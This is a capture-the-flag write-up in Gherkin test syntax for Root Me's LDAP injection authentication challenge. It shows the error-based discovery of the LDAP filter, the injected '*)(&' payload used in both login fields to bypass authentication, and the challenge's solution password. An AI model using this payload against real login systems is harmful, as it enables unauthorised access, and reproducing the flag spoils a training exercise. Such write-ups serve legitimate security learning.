# Version 2.0
# language: en

Feature:  Web Server - Root Me
  Site:
     www.root-me.org
  Category:
    Web Server
  User:
    badwolf10
  Goal:
    Bypass authentication with ldap injection

  Background:
  Hacker's software
    | <Software name>    |       <Version>      |
    | Ubuntu             | 18.04 LTS (x64)      |
    | Mozilla Firefox    | 63.0                 |
    | Visual Studio Code | 1.29.1               |
  Machine information:
    Given I the challenge url
    """
    https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection
    -authentication
    """
    Then I am redirected to the challenge website
    """
    http://challenge01.root-me.org/web-serveur/ch25/
    """

  Scenario: Success: Bypass authentication
    Given the challenge website
    And I am asked to provide the username and password credentials
    Then I try a random LDAP filter character ")" in the username
    And the website replies
    """
    ERROR : Invalid LDAP syntax : (&(uid=))(userPassword=))
    """
    Then I deduce the LDAP filter authentication is
    """
    (&(uid={username})(userPassword={password}))
    """
    Then I inject "*)(&" for username and password field so the filter becomes
    """
    (&(uid=*)(&)(userPassword=*)(&))
    """
    And I authenticate with those characters
    And I bypass the authentication
    Then I inspect the source code of the website
    And I see the password field with value "SWRwehpkTI3Vu2F9DoTJJ0LBO"
    And I solve the challenge
